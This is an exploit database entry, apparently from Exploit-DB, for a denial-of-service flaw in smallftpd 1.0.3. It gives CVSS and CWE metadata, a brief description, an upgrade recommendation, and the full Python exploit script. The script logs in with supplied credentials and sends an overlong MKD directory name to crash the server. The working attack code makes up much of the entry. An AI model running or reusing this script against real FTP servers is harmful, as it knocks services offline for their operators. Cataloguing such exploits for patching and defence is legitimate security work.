smallftp_mkd_command_DoS_Exploit

vendor:

smallftpd

by:

Greg Priest

7,5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: smallftpd

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: YES

Related CWE: N/A

CPE: smallftpd

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP, Windows 7 x64

2016

smallftp_mkd_command_DoS_Exploit

This exploit is for smallftpd 1.0.3. It allows an attacker to send a large string of characters to the server, which causes the server to crash. The attacker must have valid credentials to the FTP server in order to exploit this vulnerability.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of smallftpd, which has been patched to prevent this type of attack.

Source

Exploit-DB raw data:

from ftplib import FTP

print '''
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScrR1pTK1dd13.slammer@gmail.com   # 
                ##############################################


# Exploit Title: smallftp_mkd_command_DoS_Exploit
# Date: 2016.10.26
# Exploit Author: Greg Priest
# Version: smallftpd 1.0.3
# Tested on: Windows XP, Windows 7 x64

'''

ftp_ip = raw_input("FTP server IP:")
user = raw_input("username:")
password = raw_input("password:")
killercode = 'CRASH' * 100
ftp = FTP(ftp_ip)
ftp.login(user, password)
print ftp.login
print "CRSAH CODE SENT!"
FTP.mkd(ftp, killercode)